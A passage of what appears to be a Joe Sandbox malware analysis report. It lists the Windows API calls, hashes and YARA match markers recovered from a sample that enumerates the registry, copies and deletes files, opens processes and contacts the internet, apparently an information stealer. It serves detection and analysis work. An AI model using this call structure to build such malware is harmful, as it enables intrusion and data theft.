                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                  APIs
                                    • Part of subcall function 022A7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022A75A1
                                    • Part of subcall function 022A7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022A7618
                                    • Part of subcall function 022A7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022A7674
                                    • Part of subcall function 022A7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022A76B9
                                    • Part of subcall function 022A7537: HeapFree.KERNEL32(00000000), ref: 022A76C0
                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 022A786D
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022A78AF
                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 022A78C1
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022A78F6
                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 022A7907
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022A793A
                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 022A7954
                                  • task.LIBCPMTD ref: 022A7962
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID:
                                  • API String ID: 2677904052-0
                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction ID: b551dd971c657cf79e5477bac4c212b1d94647a8817e1bb12c08b5628b3ae0bf
                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction Fuzzy Hash: 99314D76A50209EFCB04EBE0DCA4DFEB77AFB49301F105019E102676A4DA35A946CF62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022A5231
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022A5238
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022A5251
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022A5278
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022A52A8
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 022A52F1
                                  • InternetCloseHandle.WININET(?), ref: 022A5320
                                  • InternetCloseHandle.WININET(?), ref: 022A532D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction ID: 397345b1470707d1393d1e44ef374060e73851e656b0dcae75c44e0290633fb9
                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction Fuzzy Hash: 3C3107B8A40218ABDB20CF94DC84BDDB7B5EB48704F5081D9E609A7284D7B46AC58F98
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 3894370878-0
                                  • Opcode ID: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                  • Opcode Fuzzy Hash: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                  APIs
                                    • Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
                                    • Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022B58AB
                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022B5908
                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022B5ABE
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022B5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022B548F
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022B557F
                                    • Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B5596
                                    • Part of subcall function 022B5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022B55CB
                                    • Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B55EA
                                    • Part of subcall function 022B5527: strtok.MSVCRT(00000000,?), ref: 022B5605
                                    • Part of subcall function 022B5527: lstrlen.KERNEL32(00000000), ref: 022B5615
                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022B59F2
                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022B5BA7
                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022B5C73
                                  • Sleep.KERNEL32(0000EA60), ref: 022B5C82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID:
                                  • API String ID: 3630751533-0
                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction ID: 139e1e9a3f77c8172025978433bc826e9960f973f5c2bf9238ce6bd131b2f43b
                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction Fuzzy Hash: 35E16171920304ABCB1AFBE4DD91DED737AAF56340F80812DE44666198EF786B18CF91
                                  APIs
                                  • memset.MSVCRT ref: 022A158E
                                    • Part of subcall function 022A1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022A151B
                                    • Part of subcall function 022A1507: RtlAllocateHeap.NTDLL(00000000), ref: 022A1522
                                    • Part of subcall function 022A1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022A153E
                                    • Part of subcall function 022A1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022A155C
                                    • Part of subcall function 022A1507: RegCloseKey.ADVAPI32(?), ref: 022A1566
                                  • lstrcat.KERNEL32(?,00000000), ref: 022A15B6
                                  • lstrlen.KERNEL32(?), ref: 022A15C3
                                  • lstrcat.KERNEL32(?,004262EC), ref: 022A15DE
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022A16CC
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
                                    • Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
                                    • Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
                                    • Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
                                    • Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
                                    • Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01
                                  • DeleteFileA.KERNEL32(00000000), ref: 022A1756
                                  • memset.MSVCRT ref: 022A177D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID:
                                  • API String ID: 3885987321-0
                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction ID: e83a5dadef9384a2f60cda682d08de5d0712c808d287148589712caba8c8f794
                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction Fuzzy Hash: 7C5154B19603199BCB16FBA4DD91FED737EAF54300F4041E8A60A62084EF746B89CF65
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 022B6BD3
                                  • sscanf.NTDLL ref: 022B6C00
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022B6C19
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022B6C27
                                  • ExitProcess.KERNEL32 ref: 022B6C41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID: u
                                  • API String ID: 2533653975-1051851173
                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction ID: 808cb182787545a80ee1f02b1e536fe801702ea915a9b93217549d7675bac3b4
                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction Fuzzy Hash: F421EBB5D14209AFCF09EFE4D9459EEB7BAFF48300F04852EE406A3254EB345604CB65
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,00781468,00000000,000F003F,?,00000400), ref: 004184EC
                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                  • RegQueryValueExA.ADVAPI32(00000000,00781360,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                  • Opcode Fuzzy Hash: 7f03d597bfe2c8542a51a4803dff8254a637d5eb3e7cba84a0185e5e577ec412
                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction ID: b36890d62cb3ca893cd31c8d348e0eb5c9077a4e060c1bca12aaf12a224d4413
                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                  • Instruction Fuzzy Hash: DE215BB5D00219ABDF10DFA4E848AED7B75FF04320F008225F925A7290EB706A05CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B790B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B7912
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022B7944
                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022B7965
                                  • RegCloseKey.ADVAPI32(00000000), ref: 022B796F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 8957998eaf940a0994f3994341616412949f9b87a913ee7a6ae0602f8506b236
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: 91012CB9A80205BBEB11DBE0DD49FADB7B9EB49701F005154FA05A6284D7749900CB51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,00749D30,00000000,00020119,00000000), ref: 004176DD
                                  • RegQueryValueExA.ADVAPI32(00000000,007813F0,00000000,00000000,?,000000FF), ref: 004176FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3466090806-2517555085
                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,00749D30,00000000,00020119,004176B9), ref: 0041775B
                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3466090806-1022791448
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                  APIs
                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :A$:A
                                  • API String ID: 1378416451-1974578005
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022A75A1
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022A7618
                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022A7674
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022A76B9
                                  • HeapFree.KERNEL32(00000000), ref: 022A76C0
                                    • Part of subcall function 022A94A7: vsprintf_s.MSVCRT ref: 022A94C2
                                  • task.LIBCPMTD ref: 022A77BC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                  • String ID:
                                  • API String ID: 700816787-0
                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction ID: 4f2128828bc7d5ba6241ebd1353d8f4716132f16d99e55c4dcd4da5e2d2e4d9a
                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction Fuzzy Hash: B8612BB591026C9BDB24DB90CC54FEDB7B9BF48300F0081E9E649A6544DBB0ABC9CF95
                                  APIs
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022A6548
                                    • Part of subcall function 022A64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022A656A
                                    • Part of subcall function 022A64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A659C
                                    • Part of subcall function 022A64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A65EC
                                    • Part of subcall function 022A64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022A6626
                                    • Part of subcall function 022A64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022A6638
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022B557F
                                  • lstrlen.KERNEL32(00000000), ref: 022B5596
                                    • Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 022B55CB
                                  • lstrlen.KERNEL32(00000000), ref: 022B55EA
                                  • strtok.MSVCRT(00000000,?), ref: 022B5605
                                  • lstrlen.KERNEL32(00000000), ref: 022B5615
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID:
                                  • API String ID: 3532888709-0
                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction ID: ec6761d1c74963cfe6958cb7f454c2ea5f884cfe9f996101c57192c4c9936689
                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction Fuzzy Hash: E151FC70520348DBCB29FFE8CE95AED7776AF15380F904018E50A6A598DF346B45CF61
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022B7345
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,022B7574,004205BD), ref: 022B7383
                                  • memset.MSVCRT ref: 022B73D1
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022B7525
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID:
                                  • API String ID: 224852652-0
                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction ID: 021af19b94f143a2ef5385e73da057f3a5f3000df7007178e632185d79251897
                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction Fuzzy Hash: 6B51A2B1C203199FDB25DBE4DC84BEDF7B5AF84345F1080A8E605A7184DB746A84CF68
                                  APIs
                                  • strtok_s.MSVCRT ref: 00413588
